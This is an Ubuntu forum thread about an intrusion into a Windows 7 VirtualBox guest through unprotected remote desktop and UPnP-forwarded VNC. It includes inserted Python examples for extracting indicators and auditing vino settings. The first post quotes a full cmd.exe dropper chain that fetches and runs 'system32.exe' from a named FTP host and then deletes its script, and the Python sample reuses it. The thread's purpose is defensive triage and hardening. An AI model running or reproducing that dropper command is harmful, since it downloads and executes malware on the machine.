
Thread: Virus via Windows?

  1. #11
    Join Date
    Sep 2012
    Beans
    2

    Re: Virus via Windows?

    I have an Ubuntu 12.04.1 fully updated Linux server (just updated yesterday) with the latest version of Virtualbox running Windows 7 (also fully updated). Windows 7 was running at the time.

    Today, when I used remote desktop protocol to get on to my Windows 7 VM, I saw notepad was opened, with the following text:


    cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik &echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system32.exe &exit echo Windows has been updated.


    Needless to say, it scared the crap out of me. Who was on my system, and what were they trying to do? After inspecting everything, but not finding anything relevant in any logs, I realized that I had enabled the remote display in VirtualBox for my Windows 7 VM. VirtualBox does not use a password for the RDP service. I also noticed that the vino-server in Ubuntu had used uPnP to open port 5900 on my router. I figure this is how they got in.


    I'm still not sure how the notepad was opened and if anyone was actually on my system or if it was just a script kiddie, but I turned off uPnP, disabled the remote desktop, and scanned the system for malware. Nothing was found.


    Does anyone know how a remote attacker can open Notepad (or LibreOffice apparently) without being on the machine? I know a carefully crafted URL can accomplish the task, but how did our computers visit such a URL?


    I was curious, so I ftp'd to countx6.servegame.com and downloaded system32.exe. Its signature from MS Security Essentials was Worm:Win32/Nayrabot.gen!A.


    Scary stuff...
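For triage of the text found in Notepad, here is an added example (not from the thread) that splits the cmd.exe '&' chain, rebuilds the FTP script the echo lines would have written, and pulls out the indicators a defender would block or hunt for: the drop host and port, the script file name, what is downloaded, what is executed and what is deleted. The sample input is the one-liner quoted in the post.

```python
import re
from typing import Dict, List

# Constructed sample: the one-liner the poster found in Notepad, copied from the thread.
NOTEPAD_TEXT = (
    "cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik "
    "&echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik "
    "&ftp -n -v -s:ik &del ik &system32.exe &exit echo Windows has been updated."
)

# Matches 'echo <text> >> <file>', optionally prefixed by the leading 'cmd /c'.
ECHO_REDIRECT = re.compile(r"^(?:cmd /c )?echo (.+?)\s*>>\s*(\S+)$")

def split_commands(one_liner: str) -> List[str]:
    """Split a cmd.exe '&' chain into its individual commands."""
    return [part.strip() for part in one_liner.split("&") if part.strip()]

def reconstruct_scripts(commands: List[str]) -> Dict[str, List[str]]:
    """Rebuild every file the chain writes line by line with 'echo ... >> file'."""
    files: Dict[str, List[str]] = {}
    for cmd in commands:
        m = ECHO_REDIRECT.match(cmd)
        if m:
            files.setdefault(m.group(2), []).append(m.group(1).strip())
    return files

def extract_indicators(one_liner: str) -> Dict[str, object]:
    """Pull the blockable/huntable facts out of the dropper chain."""
    commands = split_commands(one_liner)
    scripts = reconstruct_scripts(commands)
    ind = {"script_files": sorted(scripts), "host": None, "port": None,
           "ftp_user": None, "downloads": [], "executed": [], "deleted": []}
    for lines in scripts.values():          # interpret the rebuilt ftp(1) script
        for line in lines:
            words = line.split()
            if not words:
                continue
            if words[0] == "open" and len(words) >= 2:
                ind["host"] = words[1]
                ind["port"] = int(words[2]) if len(words) > 2 else 21
            elif words[0] == "user" and len(words) >= 2:
                ind["ftp_user"] = words[1]
            elif words[0] == "get" and len(words) >= 2:
                ind["downloads"].append(words[1])
    for cmd in commands:                    # what the chain runs and cleans up afterwards
        words = cmd.split()
        if words[0].lower() == "del":
            ind["deleted"].extend(words[1:])
        elif words[0].lower().endswith(".exe"):
            ind["executed"].append(words[0])
    return ind
```

Calling `extract_indicators(NOTEPAD_TEXT)` gives the host, port 21, the script file `ik`, and `system32.exe` as both the download and the executed file, with `ik` deleted afterwards; a file of that name with a recent modification time is what the next reply says to look for.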

  2. #12
    Join Date
    Sep 2007
    Location
    Oklahoma, USA
    Beans
    2,268
    Distro
    Xubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Double-check any "system32.exe" file(s) you find on that Windows VM; what you found in Notepad was a script to create a batch file that would download a file by that name, which in all likelihood would be malware.

    However since it was still in Notepad, it's quite possible that you found it before the intruder had saved and executed it. If so, you should be in good shape. But if you find a system32.exe file with a very recent file-modified date, then the Windows VM would be highly suspect...
    --
    Jim Kyle in Oklahoma, USA
    Linux Counter #259718
    Howto mark thread: https://wiki.ubuntu.com/UnansweredPo.../SolvedThreads

  3. #13
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    958
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Aha!....you have had a similar experience to my own. What first alerted me that I had been hacked was something very similar as explained above...and how I was hacked was through the vnc with uPnP ticked....now, I do not remember ticking this....last thing I remember was that I had ticked permission was needed to control the desktop....so how this changed I really do not know. It is possible I changed it...but I am 60% confident that I did not.

    I have run a number of root checks and not found anything malicious. I have now closed the ability to access my PC via the net.

    It strikes me that a) this was a bot..which is why my Libre Office writer file on my desktop was opened showing the virus script or b) some very clever (but ethical) hacker leaving his/her calling card to say "Wise up Buddy, you have been hacked!...check your system before the bad guys get in".

    I dunno, I am mystified by the whole thing. I am contemplating taking my PC back to bare metal and reinstalling....but that seems very paranoid as I cannot find any trace on the logs or on the rootkits that anything evil has happened.

    But thanks for sharing your experience...makes me feel much better in one way!
    Ubuntu is computer speak for defenestration

  4. #14
    Join Date
    Sep 2012
    Beans
    2

    Re: Virus via Windows?

    dunbrokin: From a bash prompt in an Ubuntu X environment, run the following program:
    Code:
    vino-preferences
    You might be surprised to find that the checkbox for "Automatically configure uPnP router to open and forward ports" is checked by default! Also, there is no password set up by default.

    I fixed my preferences right away! See attachment.
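A scriptable version of the check behind that dialog, added here as an example (it is not from the thread or from vino itself): it reads the keys under the org.gnome.Vino GSettings schema (key names assumed from that schema) and flags the combination described above, remote desktop on, UPnP forwarding on, no password and no prompt. The embedded dump is constructed to look like `gsettings list-recursively org.gnome.Vino` output on such a system.

```python
import shutil
import subprocess
from typing import Dict, List

# Constructed sample in the format of `gsettings list-recursively org.gnome.Vino`,
# showing the defaults the poster describes: UPnP on, no password, no prompt.
SAMPLE_DUMP = """\
org.gnome.Vino enabled true
org.gnome.Vino prompt-enabled false
org.gnome.Vino authentication-methods ['none']
org.gnome.Vino use-upnp true
org.gnome.Vino vnc-password 'keyring'
org.gnome.Vino require-encryption true
"""

def parse_gsettings(dump: str) -> Dict[str, str]:
    """Turn 'schema key value' lines into a key -> value-text map (GVariant text kept as-is)."""
    settings: Dict[str, str] = {}
    for line in dump.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0] == "org.gnome.Vino":
            settings[parts[1]] = parts[2].strip()
    return settings

def audit_vino(settings: Dict[str, str]) -> List[str]:
    """Return one finding per setting that exposes the desktop the way the thread describes."""
    findings: List[str] = []
    if settings.get("enabled") != "true":
        return findings  # vino-server is not listening on 5900, so the rest is moot
    if settings.get("use-upnp") == "true":
        findings.append("use-upnp=true: vino asks the router to forward port 5900 from the Internet")
    if "'none'" in settings.get("authentication-methods", ""):
        findings.append("authentication-methods contains 'none': connections need no password")
    if settings.get("prompt-enabled") != "true":
        findings.append("prompt-enabled=false: nobody at the desk has to approve a connection")
    if settings.get("require-encryption") != "true":
        findings.append("require-encryption=false: traffic, password included, is sent in the clear")
    return findings

def live_dump() -> str:
    """Read the real settings when gsettings is available; otherwise use the constructed sample."""
    if shutil.which("gsettings"):
        return subprocess.run(["gsettings", "list-recursively", "org.gnome.Vino"],
                              capture_output=True, text=True).stdout
    return SAMPLE_DUMP
```

Run `audit_vino(parse_gsettings(live_dump()))` on the Ubuntu box; an empty list means none of the risky settings are in effect.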

  5. #15
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    958
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Quote Originally Posted by catnmouse View Post
    dunbrokin: You might be surprised to find that the checkbox for "Automatically configure uPnP router to open and forward ports" is checked by default! Also, there is no password set up by default.
    I have already done that thanks....yes, I am more than surprised that this is the default!...what a security risk that is for all newbie Ubuntu users!
    Ubuntu is computer speak for defenestration
